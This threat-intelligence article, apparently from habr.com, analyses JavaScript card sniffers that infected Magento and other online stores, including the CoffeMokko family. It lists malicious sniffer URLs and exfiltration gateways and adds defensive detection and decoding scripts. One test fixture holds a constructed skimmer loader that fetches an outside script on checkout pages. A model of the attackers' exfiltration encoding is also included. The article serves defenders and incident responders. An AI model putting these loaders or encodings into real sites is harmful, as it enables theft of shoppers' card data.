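The first of those exploits leaves its payload in the database rather than on disk, so a file-integrity scan of the web root will not find it. The following is an added example written for this page (not code from the article, from the exploit or from Magento): an incident-response check over rows exported from the core_config_data table, looking at the two configuration paths that Magento renders into every page, design/head/includes (the "Miscellaneous Scripts" head field) and design/footer/absolute_footer (the "Miscellaneous HTML" footer field). The rows, the trusted-host allowlist and the host names are constructed for the example.

```javascript
// Added example, not from the article and not Magento's own code: an incident-response
// check over rows exported from Magento's core_config_data table, where the
// CVE-2016-4010 exploit mentioned above writes its payload. It looks at the two
// config paths rendered into every page (head "Miscellaneous Scripts" and footer
// "Miscellaneous HTML") and flags script references that do not belong there.
// The rows and host names below are constructed.

const PAGE_TEMPLATE_PATHS = ['design/head/includes', 'design/footer/absolute_footer'];

// Hosts the store is expected to load scripts from (assumed allowlist).
const TRUSTED_SCRIPT_HOSTS = ['shop.example.com', 'www.googletagmanager.com'];

// Collect script URLs both from <script src="..."> tags and from dynamic
// loaders that assign element.src = "..." inside an inline script.
function scriptSources(html) {
  const urls = [];
  const tagSrc = /<script\b[^>]*\ssrc\s*=\s*["']?([^"'\s>]+)/gi;
  const propSrc = /\.src\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = tagSrc.exec(html)) !== null) urls.push(m[1]);
  while ((m = propSrc.exec(html)) !== null) urls.push(m[1]);
  return urls;
}

function hostOf(url, base) {
  try { return new URL(url, base).hostname; } catch { return null; }
}

// Return one finding per suspicious row: {scope, path, reasons[]}.
function findInjectedScripts(rows, trustedHosts, baseUrl = 'https://shop.example.com/') {
  const findings = [];
  for (const row of rows) {
    if (!PAGE_TEMPLATE_PATHS.includes(row.path)) continue;
    const value = row.value || '';
    const reasons = [];
    for (const src of scriptSources(value)) {
      const host = hostOf(src, baseUrl);
      if (host && !trustedHosts.includes(host)) reasons.push('external script from ' + host);
    }
    if (/\b(atob|eval|unescape)\s*\(|String\.fromCharCode/.test(value)) {
      reasons.push('decoder or eval call in inline script');
    }
    if (/createElement\s*\(\s*["']script["']\s*\)/.test(value)) {
      reasons.push('inline script loads another script at runtime');
    }
    if (/[A-Za-z0-9+/]{40,}={0,2}/.test(value)) {
      reasons.push('long base64-looking blob');
    }
    if (reasons.length > 0) {
      findings.push({ scope: row.scope + ':' + row.scope_id, path: row.path, reasons });
    }
  }
  return findings;
}

// Constructed export: one clean default-scope head include, one injected store-scope footer.
const SAMPLE_ROWS = [
  { scope: 'default', scope_id: 0, path: 'web/unsecure/base_url', value: 'https://shop.example.com/' },
  { scope: 'default', scope_id: 0, path: 'design/head/includes',
    value: '<script type="text/javascript" src="https://www.googletagmanager.com/gtm.js?id=GTM-EXAMPLE"></script>' },
  { scope: 'stores', scope_id: 1, path: 'design/footer/absolute_footer',
    value: '<script>if(location.href.indexOf(atob("Y2hlY2tvdXQ="))!==-1){' +
           'var s=document.createElement("script");s.src="https://static-cdn.example.net/api.js?v=2.1.1";' +
           'document.head.appendChild(s)}</script>' },
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(findInjectedScripts(SAMPLE_ROWS, TRUSTED_SCRIPT_HOSTS), null, 2));
}
```

Check every scope, not just the default one: a store-view or website-scope row overrides the default and is easy to overlook in the admin UI, which is exactly why the sample flags a row with scope stores:1. The same check belongs in a periodic job, since an attacker who keeps admin access (via the phishing described above) can simply write the value back after a cleanup.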

In addition, the analysis of the server turned up various sniffer samples and fake payment forms that the attackers used to collect payment information from the hacked sites. As can be seen from the list below, some scripts were created individually for each hacked site, while for certain CMS and payment gateways a universal solution was used. For example, the scripts segapay_standart.js and segapay_onpage.js are designed for deployment on sites that use the Sage Pay payment system.

List of scripts for different payment gateways

Script Gate
sr.illum[.]pw/mjs_special/visiondirect.co.uk.js //request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs_special/topdierenshop.nl.js //request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/tiendalenovo.es.js //request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/pro-bolt.com.js //request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/plae.co.js //request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/ottolenghi.co.uk.js //request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/oldtimecandy.com.js //request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs_special/mylook.ee.js //cdn.illum[.]pw/records.php
sr.illum[.]pw/mjs_special/luluandsky.com.js //request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs_special/julep.com.js //cdn.illum[.]pw/records.php
sr.illum[.]pw/mjs_special/gymcompany.es.js //request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/grotekadoshop.nl.js //request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs_special/fushi.co.uk.js //request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs_special/fareastflora.com.js //request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs_special/compuindia.com.js //request.payrightnow[.]cf/alldata.php
sr.illum[.]pw/mjs/segapay_standart.js //cdn.illum[.]pw/records.php
sr.illum[.]pw/mjs/segapay_onpage.js //cdn.illum[.]pw/records.php
sr.illum[.]pw/mjs/replace_standart.js //request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/mjs/all_inputs.js //cdn.illum[.]pw/records.php
sr.illum[.]pw/mjs/add_inputs_standart.js //request.payrightnow[.]cf/checkpayment.php
sr.illum[.]pw/magento/payment_standart.js //cdn.illum[.]pw/records.php
sr.illum[.]pw/magento/payment_redirect.js //payrightnow[.]cf/?payment=
sr.illum[.]pw/magento/payment_redcrypt.js //payrightnow[.]cf/?payment=
sr.illum[.]pw/magento/payment_forminsite.js //paymentnow[.]tk/?payment=

The host paynow[.]tk, used as the gateway in the payment_forminsite.js script, turned up as a subjectAltName in several certificates associated with the CloudFlare service. The same host also carried a script named evil.js. Judging by its name, it could have been used as part of the exploitation of CVE-2016-4010, which makes it possible to inject malicious code into the footer of a page on a Magento site. This script used request.requestnet[.]tk as its gateway, a host served with the same certificate as paynow[.]tk.

Fake payment forms

The figure below shows an example of a card data entry form. This form was injected into an online store to steal card data.

The next figure shows an example of a fake PayPal payment form that the attackers injected into sites offering this payment method.
Infrastructure

Domain  Date of detection/appearance
cdn.illum.pw 27/11/2016
records.nstatistics.com 06/09/2018
request.payrightnow.cf 25/05/2018
paynow.tk 16/07/2017
payline.tk 01/03/2018
paypal.cf 04/09/2017
requestnet.tk 28/06/2017

CoffeMokko family

The CoffeMokko sniffer family, designed to steal the bank card data of online store customers, has been in use since May 2017. Its operators are presumably the criminal group Group 1, described by RiskIQ specialists in 2016. Sites running the Magento, OpenCart, WordPress, osCommerce and Shopify CMSs were attacked.

How CoffeMokko is embedded in online store code

The operators of this family create a unique sniffer for each infection: the sniffer file lives in the src or js directory on the attackers' server. It is embedded in the site's code via a direct link to the sniffer.

The sniffer code hardcodes the names of the form fields whose data is to be stolen. It also checks whether the user is on the checkout page by matching a list of keywords against the user's current URL.

Some of the discovered sniffer versions were obfuscated and contained an encrypted string holding the main resource array: the names of the form fields for various payment systems and the address of the gateway to which stolen data should be sent.

Stolen payment data was sent to a script on the attackers' server at the path /savePayment/index.php or /tr/index.php. This script is probably used to forward the data from the gateway to a main server that consolidates the data from all sniffers. To hide the transmitted data, all of the victim's payment information is base64-encoded and then several character substitutions are applied:

  • the character "e" is replaced with ":"
  • "w" is replaced with "+"
  • "o" is replaced with "%"
  • "d" is replaced with "#"
  • "a" is replaced with "-"
  • "7" is replaced with "^"
  • "h" is replaced with "_"
  • "T" is replaced with "@"
  • "0" is replaced with "/"
  • "Y" is replaced with "*"

Because characters of the base64 alphabet are substituted, the data cannot be decoded without reversing the transformation first.
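As an added example (not code from the article or from the CoffeMokko sniffer itself), the Node.js script below models the exfiltration encoding just described, base64 followed by the ten single-character swaps, together with the inverse transform an analyst needs in order to read a captured POST body. Only the swap table comes from the article; the sample record and its "|"-separated layout are constructed for the example. It also shows a caveat the article does not mention: two of the replacement characters, "+" and "/", are themselves part of the base64 alphabet, so a record whose base64 already contains them cannot be decoded unambiguously.

```javascript
// Added example: model of the CoffeMokko exfiltration encoding and its inverse.
// The swap table is from the article; everything else is an assumption.

const SWAPS = [
  ['e', ':'], ['w', '+'], ['o', '%'], ['d', '#'], ['a', '-'],
  ['7', '^'], ['h', '_'], ['T', '@'], ['0', '/'], ['Y', '*'],
];

// base64-encode, then apply every swap. No swap emits a character that another
// swap consumes, so the order in which they are applied does not matter.
function encodeExfil(record) {
  let out = Buffer.from(record, 'utf8').toString('base64');
  for (const [from, to] of SWAPS) out = out.split(from).join(to);
  return out;
}

// Undo the swaps, then base64-decode: the "reverse transformation" the
// receiving script on the attackers' server has to perform.
function decodeExfil(encoded) {
  let b64 = encoded;
  for (const [from, to] of SWAPS) b64 = b64.split(to).join(from);
  return Buffer.from(b64, 'base64').toString('utf8');
}

// What a plain base64 decode of the body yields: the swapped characters are
// either dropped or decoded as the wrong sextets, so the record is not recovered.
function naiveDecode(encoded) {
  return Buffer.from(encoded, 'base64').toString('utf8');
}

// Caveat: '+' and '/' are base64 alphabet characters, yet the table also produces
// them from 'w' and '0'. If the record's base64 already contains '+' or '/', the
// receiver cannot tell them apart from swapped 'w'/'0'. Pure ASCII input never
// produces sextet values 62 or 63, so PANs, expiry dates and CVVs always round-trip;
// non-ASCII cardholder names or addresses may not.
function isRecoverable(record) {
  return !/[+/]/.test(Buffer.from(record, 'utf8').toString('base64'));
}

// Constructed sample record (a test PAN, not real data).
const SAMPLE_RECORD = '4111111111111111|12/24|123|shop.example';
```

For triage of a captured request, run decodeExfil over the body and check isRecoverable on the result; a decode that produces invalid UTF-8 or a field that fails a Luhn check is the sign that the ambiguous "+"/"/" case was hit.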

This is what a fragment of an unobfuscated sniffer looks like:

Infrastructure analysis

In early campaigns the attackers registered domain names that resembled those of legitimate online stores. Their domains could differ from the legitimate one by a single character or by the TLD. The registered domains hosted the sniffer code, a link to which was embedded in the store's code.

The group also used domain names resembling popular jQuery plugins (slickjs[.]org for sites using the slick.js plugin) and payment gateways (sagecdn[.]org for sites using the Sage Pay payment system).

Later the group began registering domains whose names had nothing to do with the store or its line of business.

Each domain corresponded to a site on which a /js or /src directory was created. Sniffer scripts were stored in that directory, one sniffer per new infection. The sniffer was embedded in the site's code via a direct link, but in rare cases the attackers modified one of the site's own files and added the malicious code to it.
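The three hosting patterns above (a near-copy of the store's own domain, a domain borrowing the name of a popular library or payment provider, and later an unrelated domain) are exactly what an audit of a checkout page's script sources should flag. The following is an added example, not code from the article: a Node.js script that extracts every `<script src>` from a page, resolves it to a host and classifies anything that is neither first-party nor on an allowlist. The HTML, the allowlist, the brand keyword list and the edit-distance threshold are all constructed assumptions for the example.

```javascript
// Added example: audit <script src> hosts on a checkout page for skimmer-style
// loaders. Sample page, allowlist and keyword list are constructed, not from the article.

const ALLOWED_HOSTS = new Set(['code.jquery.com', 'live.sagepay.com']);
const BRAND_KEYWORDS = ['jquery', 'slick', 'sage', 'paypal', 'magento'];

// Constructed checkout page: one first-party script, one allowlisted CDN, and three
// loaders of the kinds described above.
const SAMPLE_HTML = `
<script src="/js/checkout.js"></script>
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="https://shop-exarnple.com/js/checkout.js"></script>
<script src="//sagecdn.example/js/sage.js"></script>
<script src="https://cdn.unknown-host.net/a.js"></script>
`;

// Pull every external script reference and resolve it against the page URL, so
// relative ("/js/x.js") and protocol-relative ("//host/x.js") sources get a hostname.
function extractScriptHosts(html, pageUrl) {
  const re = /<script\b[^>]*\ssrc\s*=\s*["']([^"']+)["']/gi;
  const hosts = [];
  let m;
  while ((m = re.exec(html)) !== null) hosts.push(new URL(m[1], pageUrl).hostname);
  return hosts;
}

// Levenshtein distance with a single rolling row; enough to catch one- or
// two-character variants of a domain label.
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const tmp = prev[j];
      prev[j] = Math.min(prev[j] + 1, prev[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = tmp;
    }
  }
  return prev[b.length];
}

// Naive "registrable domain" = last two labels. Fine for the example; real tooling
// should use the Public Suffix List, since co.uk and similar break this rule.
function registrable(host) {
  return host.split('.').slice(-2).join('.');
}

// Returns null for hosts that need no attention, otherwise a verdict string.
function classifyHost(host, ownDomain, allowed) {
  if (host === ownDomain || host.endsWith('.' + ownDomain)) return null; // first party
  if (allowed.has(host)) return null;
  const [label] = registrable(host).split('.');
  const [ownLabel] = registrable(ownDomain).split('.');
  // Same or nearly the same second-level label: covers one-character typos and TLD swaps.
  if (levenshtein(label, ownLabel) <= 2) return 'lookalike-of-own-domain';
  if (BRAND_KEYWORDS.some((k) => label.includes(k))) return 'brand-squat';
  return 'unknown-third-party';
}

function auditScripts(html, ownDomain, allowed) {
  const findings = [];
  for (const host of extractScriptHosts(html, `https://${ownDomain}/checkout/`)) {
    const verdict = classifyHost(host, ownDomain, allowed);
    if (verdict) findings.push({ host, verdict });
  }
  return findings;
}
```

Run auditScripts over a fetched copy of the checkout page, or better, over the HTML served to a real browser session, since a sniffer injected by a modified first-party file (the rare case mentioned above) only becomes visible as an external host at the point where it posts data, which this source-level check will not see. The edit-distance threshold produces false positives on very short labels; tune it to the store's own domain.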

Code analysis

First obfuscation algorithm

In some of the discovered samples of this family, the code was obfuscated and contained the encrypted data the sniffer needs to operate: in particular the sniffer's gateway address, the list of payment form fields and, in some cases, the code of a fake payment form. Inside the function, the resources were encrypted with XOR using a key passed as an argument to that same function.

Decrypting the string with the appropriate key, which is unique to each sample, yields a single string containing all the strings from the sniffer code separated by a delimiter.
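The following is an added example, not code from the article or from any CoffeMokko sample. It shows how to recover such a resource string offline, by pulling the ciphertext literal and the key argument out of the sample's source text and decrypting them with repeating-key XOR, rather than executing the sample. The mock sample is constructed here; its hex encoding of the ciphertext, the "|" delimiter, the variable names and the key are assumptions standing in for whatever a real sample uses.

```javascript
// Added example: static recovery of an XOR-protected resource string from a
// sniffer sample. The mock sample, key, delimiter and layout are assumptions.

const RESOURCES = [
  'https://cdn.example[.]org/savePayment/index.php', // gateway address (constructed)
  'cc_number', 'cc_exp_month', 'cc_exp_year', 'cc_cid', // form fields to capture
];
const KEY = 'm0kk0';   // assumed key passed as the function argument
const DELIM = '|';     // assumed delimiter between resources

// Repeating-key XOR over raw bytes; the same routine encrypts and decrypts.
function xorBytes(data, key) {
  const k = Buffer.from(key, 'utf8');
  const out = Buffer.alloc(data.length);
  for (let i = 0; i < data.length; i++) out[i] = data[i] ^ k[i % k.length];
  return out;
}

// Build the mock obfuscated sample the way such a sniffer ships it: an IIFE that
// receives the key and holds the ciphertext as a hex literal.
function buildMockSample(resources, key) {
  const hex = xorBytes(Buffer.from(resources.join(DELIM), 'utf8'), key).toString('hex');
  return [
    '(function(k){',
    `  var d = "${hex}";`,
    '  var r = x(d, k).split("|");', // the sample's own decoder; never executed here
    '  /* ... sniffer body ... */',
    `})("${key}");`,
  ].join('\n');
}

// Static extraction: one regex for the hex literal, one for the trailing call argument.
function extractBlobAndKey(source) {
  const blob = /var d = "([0-9a-f]+)"/.exec(source);
  const key = /\}\)\("([^"]*)"\);\s*$/.exec(source);
  if (!blob || !key) throw new Error('sample layout not recognised');
  return { hex: blob[1], key: key[1] };
}

// Decrypt and split into the resource array the sniffer would build at runtime.
function decryptResources(hex, key) {
  return xorBytes(Buffer.from(hex, 'hex'), key).toString('utf8').split(DELIM);
}

function recoverFromSource(source) {
  const { hex, key } = extractBlobAndKey(source);
  return decryptResources(hex, key);
}

const MOCK_SAMPLE = buildMockSample(RESOURCES, KEY);
```

The point of doing it this way rather than in a browser console is that the sample's remaining code never runs: the only things evaluated are a regex match and a byte-wise XOR. Against a real sample, the two regexes are what you adapt; the XOR and split stay the same as long as the key is passed in the clear as the article describes.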

Second obfuscation algorithm

In later samples of this family a different obfuscation mechanism was used: here the data was encrypted with a home-grown algorithm. The string containing the encrypted data the sniffer needs to operate was passed as an argument to the decryption function.

Using the browser console, the encrypted data can be decrypted to obtain the array containing the sniffer's resources. Do this only in an isolated browser profile with network access disabled, so that nothing else in the sample can run against a live site.

Link to early MageCart attacks

While analysing the domains the group used as gateways for collecting stolen data, it was found that one of them hosted credit card theft tools similar to those used by Group 1, one of the first groups discovered by RiskIQ specialists.

Two files were found on the CoffeMokko sniffer host:

  • mage.js: a file containing Group 1 sniffer code with the gateway address js-cdn.link
  • mag.php: a PHP script responsible for collecting the data stolen by the sniffer

Contents of the mage.js file

It was also established that the earliest domains used by the group behind the CoffeMokko family were registered on May 17, 2017:

  • link-js[.]link
  • info-js[.]link
  • track-js[.]link
  • map-js[.]link
  • smart-js[.]link

The format of these domain names matches that of the Group 1 domains used in the 2016 attacks.

Based on these findings, a link can be assumed between the CoffeMokko operators and the criminal group Group 1. The CoffeMokko operators may have borrowed tools and card theft software from their predecessors. More likely, however, the criminal group using the CoffeMokko sniffer family is the same people who carried out the Group 1 attacks. After the first report on the group's activity was published, all of its domain names were blocked and its tools were studied in detail and described. The group was forced to pause, rework its internal tools and rewrite the sniffer code in order to continue its attacks and stay undetected.

Infrastructure

Domain  Date of detection/appearance
link-js.link 17.05.2017
info-js.link 17.05.2017
track-js.link 17.05.2017
map-js.link 17.05.2017
smart-js.link 17.05.2017
adorebeauty.org 03.09.2017
chitetezo-malipiro.su 03.09.2017
braincdn.org 04.09.2017
sagecdn.org 04.09.2017
slickjs.org 04.09.2017
oakandfort.org 10.09.2017
citywnery.org 15.09.2017
dobell.su 04.10.2017
anasplayclothing.org 31.10.2017
jewsondirect.com 05.11.2017
shop-rnib.org 15.11.2017
closetlondon.org 16.11.2017
misshaus.org 28.11.2017
battery-force.org 01.12.2017
kik-vape.org 01.12.2017
greatfurnituretradingco.org 02.12.2017
etradesupply.org 04.12.2017
replacemyremote.org 04.12.2017
all-about-sneakers.org 05.12.2017
mage-checkout.org 05.12.2017
nililotan.org 07.12.2017
lamoodbighat.net 08.12.2017
walletgear.org 10.12.2017
dahlie.org 12.12.2017
davidsfootwear.org 20.12.2017
blackriverrimaging.org 23.12.2017
exrpesso.org 02.01.2018
parks.su 09.01.2018
pmtonline.su 12.01.2018
otocap.org 15.01.2018
christohperward.org 27.01.2018
coffetea.org 31.01.2018
energycoffe.org 31.01.2018
energytea.org 31.01.2018
teacoffe.net 31.01.2018
adaptivecss.org 01.03.2018
coffemokko.com 01.03.2018
londontea.net 01.03.2018
ukcoffe.com 01.03.2018
labbe.biz 20.03.2018
batterynart.com 03.04.2018
btosports.net 09.04.2018
chicksaddlery.net 16.04.2018
paypay.org 11.05.2018
ar500arnor.com 26.05.2018
authorizecdn.com 28.05.2018
slickmin.com 28.05.2018
bannerbuzz.info 03.06.2018
kandypens.net 08.06.2018
mylrendyphone.com 15.06.2018
freshchat.info 01.07.2018
3lift.org 02.07.2018
abtasty.net 02.07.2018
mechat.info 02.07.2018
zoplm.com 02.07.2018
zapaljs.com 02.09.2018
foodandcot.com 15.09.2018
freshdepor.com 15.09.2018
swappastore.com 15.09.2018
verywellfitnesse.com 15.09.2018
elegrina.com 18.11.2018
majsurplus.com 19.11.2018
Top5value.com 19.11.2018

Source: www.habr.com
